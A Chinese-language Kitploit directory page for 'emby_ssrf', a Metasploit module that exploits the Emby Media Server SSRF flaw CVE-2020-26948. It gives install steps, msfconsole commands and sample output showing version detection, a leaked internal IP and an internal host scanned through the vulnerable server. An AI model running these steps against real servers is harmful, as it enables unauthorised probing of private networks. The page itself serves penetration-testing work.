Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
emby_ssrf — Metasploit 辅助模块,用于识别 Emby Media Server 版本,并利用 CVE-2020-26948 SSRF 漏洞扫描内部网络服务。 | Kitploit
工具/GitHubGitHub/btnz-k/emby_ssrf
侦察漏洞扫描器网络映射漏洞分析漏洞利用Web应用程序漏洞利用
GitHubbtnz-k/emby_ssrf

emby_ssrf

Metasploit 辅助模块,用于识别 Emby Media Server 版本,并利用 CVE-2020-26948 SSRF 漏洞扫描内部网络服务。

查看仓库
155年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

msf_emby

该工具会检查远程 EMBY 服务器,试图利用 SSRF 漏洞对 EMBY 服务器内部网络进行 HTTP 扫描。该工具基于漏洞 CVE-2020-26948。

安装

克隆仓库并将 rb 文件放入 /usr/share/metasploit-framework/modules/auxiliary/scanner/http/ 目录。运行 msfconsole,然后从那里使用这些模块。

帮助

Emby_Version:

  1. 执行: use auxiliary/scanner/http/emby_version_ssrf
  2. 执行: set rhosts [ips]
  3. 执行: run
msf6 > use auxiliary/scanner/http/emby_version_ssrf
msf6 auxiliary(scanner/http/emby_version_ssrf) > set rhosts 10.10.200.32
rhosts => 10.10.200.32
msf6 auxiliary(scanner/http/emby_version_ssrf) > run

[*] Identifying Media Server Version on 10.10.200.32:8096
[+] [Media Server] URI: http://10.10.200.32:8096  /
[+] [Media Server] Version: 4.4.2.0
[+] [Media Server] Internal IP: http://192.168.2.3:8096
[+] *** Vulnerable to SSRF module auxiliary/scanner/emby_ssrf_scanner! ***
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Emby_Scan:

  1. 执行: use auxiliary/scanner/http/emby_ssrf_scanner
  2. 执行: set rhosts [ips]
  3. 执行: set emby_server [emby_server_ip]
  4. 执行: run
msf6 > use auxiliary/scanner/http/emby_ssrf_scanner
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set emby_server 10.10.200.32
emby_server => 10.10.200.32
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set rhosts 192.168.2.3
rhosts => 192.168.2.3
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > run

[+] 192.168.2.3:8096 Title: Emby
[+] 192.168.2.3:8096     HTTP Code: 200
[+] 192.168.2.3:8096     Location Header:
[+] 192.168.2.3:8096     Server Header: UPnP/1.0 DLNADOC/1.50
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
下载工具